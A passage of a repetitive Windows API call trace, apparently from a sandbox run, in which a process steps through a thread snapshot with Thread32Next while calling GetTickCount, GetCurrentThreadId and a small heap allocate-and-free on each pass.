[0057.907] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.908] GetTickCount () returned 0x11db307 [0057.908] GetCurrentThreadId () returned 0x9e0 [0057.908] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.908] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.908] GetTickCount () returned 0x11db307 [0057.908] GetCurrentThreadId () returned 0x9e0 [0057.908] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.908] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.909] GetTickCount () returned 0x11db307 [0057.909] GetCurrentThreadId () returned 0x9e0 [0057.909] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.909] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.909] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.910] GetTickCount () returned 0x11db307 [0057.910] GetCurrentThreadId () returned 0x9e0 [0057.910] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.910] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.910] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.910] GetTickCount () returned 0x11db307 [0057.910] GetCurrentThreadId () returned 0x9e0 [0057.910] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.910] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.911] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.911] GetTickCount () returned 0x11db307 [0057.911] GetCurrentThreadId () returned 0x9e0 [0057.911] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.911] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.911] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.912] GetTickCount () returned 0x11db307 [0057.912] GetCurrentThreadId () returned 0x9e0 [0057.912] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.912] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.912] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.913] GetTickCount () returned 0x11db307 [0057.913] GetCurrentThreadId () returned 0x9e0 [0057.913] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.913] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.913] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.926] GetTickCount () returned 0x11db317 [0057.927] GetCurrentThreadId () returned 0x9e0 [0057.927] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.927] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.927] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.927] GetTickCount () returned 0x11db317 [0057.927] GetCurrentThreadId () returned 0x9e0 [0057.927] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.927] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.927] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.928] GetTickCount () returned 0x11db317 [0057.928] GetCurrentThreadId () returned 0x9e0 [0057.928] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.928] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.928] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.929] GetTickCount () returned 0x11db327 [0057.929] GetCurrentThreadId () returned 0x9e0 [0057.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.929] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.929] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.929] GetTickCount () returned 0x11db327 [0057.929] GetCurrentThreadId () returned 0x9e0 [0057.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.929] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.930] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.930] GetTickCount () returned 0x11db327 [0057.930] GetCurrentThreadId () returned 0x9e0 [0057.930] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.930] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.930] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.931] GetTickCount () returned 0x11db327 [0057.931] GetCurrentThreadId () returned 0x9e0 [0057.931] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.931] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.931] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.931] GetTickCount () returned 0x11db327 [0057.932] GetCurrentThreadId () returned 0x9e0 [0057.932] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.932] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.932] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.932] GetTickCount () returned 0x11db327 [0057.932] GetCurrentThreadId () returned 0x9e0 [0057.932] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.932] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.932] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.933] GetTickCount () returned 0x11db327 [0057.933] GetCurrentThreadId () returned 0x9e0 [0057.933] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.933] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.933] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.934] GetTickCount () returned 0x11db327 [0057.934] GetCurrentThreadId () returned 0x9e0 [0057.934] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.934] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.934] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.934] GetTickCount () returned 0x11db327 [0057.934] GetCurrentThreadId () returned 0x9e0 [0057.934] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.934] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.935] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.935] GetTickCount () returned 0x11db327 [0057.935] GetCurrentThreadId () returned 0x9e0 [0057.935] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.935] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.935] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.936] GetTickCount () returned 0x11db327 [0057.936] GetCurrentThreadId () returned 0x9e0 [0057.936] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.936] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.936] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.937] GetTickCount () returned 0x11db327 [0057.937] GetCurrentThreadId () returned 0x9e0 [0057.937] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.937] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.937] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.937] GetTickCount () returned 0x11db327 [0057.937] GetCurrentThreadId () returned 0x9e0 [0057.937] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.937] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.937] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.938] GetTickCount () returned 0x11db327 [0057.938] GetCurrentThreadId () returned 0x9e0 [0057.938] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.938] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.938] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.939] GetTickCount () returned 0x11db327 [0057.939] GetCurrentThreadId () returned 0x9e0 [0057.939] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.939] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.939] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.940] GetTickCount () returned 0x11db327 [0057.940] GetCurrentThreadId () returned 0x9e0 [0057.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.940] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.940] GetTickCount () returned 0x11db327 [0057.940] GetCurrentThreadId () returned 0x9e0 [0057.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.940] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.941] GetTickCount () returned 0x11db327 [0057.941] GetCurrentThreadId () returned 0x9e0 [0057.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.941] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.942] GetTickCount () returned 0x11db327 [0057.942] GetCurrentThreadId () returned 0x9e0 [0057.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.942] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.943] GetTickCount () returned 0x11db327 [0057.943] GetCurrentThreadId () returned 0x9e0 [0057.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.943] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.943] GetTickCount () returned 0x11db327 [0057.943] GetCurrentThreadId () returned 0x9e0 [0057.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.943] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.944] GetTickCount () returned 0x11db327 [0057.944] GetCurrentThreadId () returned 0x9e0 [0057.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.944] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.945] GetTickCount () returned 0x11db336 [0057.945] GetCurrentThreadId () returned 0x9e0 [0057.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.945] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.946] GetTickCount () returned 0x11db336 [0057.946] GetCurrentThreadId () returned 0x9e0 [0057.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.946] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.946] GetTickCount () returned 0x11db336 [0057.946] GetCurrentThreadId () returned 0x9e0 [0057.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.946] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.947] GetTickCount () returned 0x11db336 [0057.947] GetCurrentThreadId () returned 0x9e0 [0057.947] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.947] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.947] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.948] GetTickCount () returned 0x11db336 [0057.948] GetCurrentThreadId () returned 0x9e0 [0057.948] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.948] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.948] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.948] GetTickCount () returned 0x11db336 [0057.948] GetCurrentThreadId () returned 0x9e0 [0057.948] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.949] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.949] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.949] GetTickCount () returned 0x11db336 [0057.949] GetCurrentThreadId () returned 0x9e0 [0057.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.949] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.949] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.950] GetTickCount () returned 0x11db336 [0057.950] GetCurrentThreadId () returned 0x9e0 [0057.950] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.950] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.950] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.950] GetTickCount () returned 0x11db336 [0057.951] GetCurrentThreadId () returned 0x9e0 [0057.951] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.951] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.951] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.951] GetTickCount () returned 0x11db336 [0057.951] GetCurrentThreadId () returned 0x9e0 [0057.951] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.951] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.951] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.952] GetTickCount () returned 0x11db336 [0057.952] GetCurrentThreadId () returned 0x9e0 [0057.952] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.952] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.952] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.953] GetTickCount () returned 0x11db336 [0057.953] GetCurrentThreadId () returned 0x9e0 [0057.953] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.953] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.953] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.953] GetTickCount () returned 0x11db336 [0057.953] GetCurrentThreadId () returned 0x9e0 [0057.953] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.953] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.953] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.954] GetTickCount () returned 0x11db336 [0057.954] GetCurrentThreadId () returned 0x9e0 [0057.954] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.954] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.954] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.955] GetTickCount () returned 0x11db336 [0057.955] GetCurrentThreadId () returned 0x9e0 [0057.955] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.955] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.955] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.955] GetTickCount () returned 0x11db336 [0057.955] GetCurrentThreadId () returned 0x9e0 [0057.955] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.955] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.956] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.956] GetTickCount () returned 0x11db336 [0057.956] GetCurrentThreadId () returned 0x9e0 [0057.956] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.956] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.956] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.957] GetTickCount () returned 0x11db336 [0057.957] GetCurrentThreadId () returned 0x9e0 [0057.957] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.957] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.957] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.958] GetTickCount () returned 0x11db336 [0057.958] GetCurrentThreadId () returned 0x9e0 [0057.958] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.958] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.958] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.958] GetTickCount () returned 0x11db336 [0057.958] GetCurrentThreadId () returned 0x9e0 [0057.958] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.958] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.958] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.959] GetTickCount () returned 0x11db336 [0057.959] GetCurrentThreadId () returned 0x9e0 [0057.959] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.959] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.959] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.960] GetTickCount () returned 0x11db346 [0057.960] GetCurrentThreadId () returned 0x9e0 [0057.960] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.960] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.960] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.961] GetTickCount () returned 0x11db346 [0057.961] GetCurrentThreadId () returned 0x9e0 [0057.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.961] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.961] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.961] GetTickCount () returned 0x11db346 [0057.961] GetCurrentThreadId () returned 0x9e0 [0057.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.961] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.961] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.962] GetTickCount () returned 0x11db346 [0057.962] GetCurrentThreadId () returned 0x9e0 [0057.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.962] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.963] GetTickCount () returned 0x11db346 [0057.963] GetCurrentThreadId () returned 0x9e0 [0057.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.963] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.963] GetTickCount () returned 0x11db346 [0057.964] GetCurrentThreadId () returned 0x9e0 [0057.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.964] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.964] GetTickCount () returned 0x11db346 [0057.964] GetCurrentThreadId () returned 0x9e0 [0057.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.964] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.965] GetTickCount () returned 0x11db346 [0057.965] GetCurrentThreadId () returned 0x9e0 [0057.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.965] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.966] GetTickCount () returned 0x11db346 [0057.966] GetCurrentThreadId () returned 0x9e0 [0057.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.966] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.966] GetTickCount () returned 0x11db346 [0057.966] GetCurrentThreadId () returned 0x9e0 [0057.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.966] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.967] GetTickCount () returned 0x11db346 [0057.967] GetCurrentThreadId () returned 0x9e0 [0057.967] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.967] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.968] GetTickCount () returned 0x11db346 [0057.968] GetCurrentThreadId () returned 0x9e0 [0057.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.968] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.968] GetTickCount () returned 0x11db346 [0057.968] GetCurrentThreadId () returned 0x9e0 [0057.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.969] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.969] GetTickCount () returned 0x11db346 [0057.969] GetCurrentThreadId () returned 0x9e0 [0057.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.969] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.970] GetTickCount () returned 0x11db346 [0057.970] GetCurrentThreadId () returned 0x9e0 [0057.970] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.970] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.970] GetTickCount () returned 0x11db346 [0057.970] GetCurrentThreadId () returned 0x9e0 [0057.970] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.971] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.971] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.971] GetTickCount () returned 0x11db346 [0057.971] GetCurrentThreadId () returned 0x9e0 [0057.971] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.971] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.971] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.972] GetTickCount () returned 0x11db346 [0057.972] GetCurrentThreadId () returned 0x9e0 [0057.972] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.972] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.972] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0057.972] GetTickCount () returned 0x11db346 [0057.973] GetCurrentThreadId () returned 0x9e0 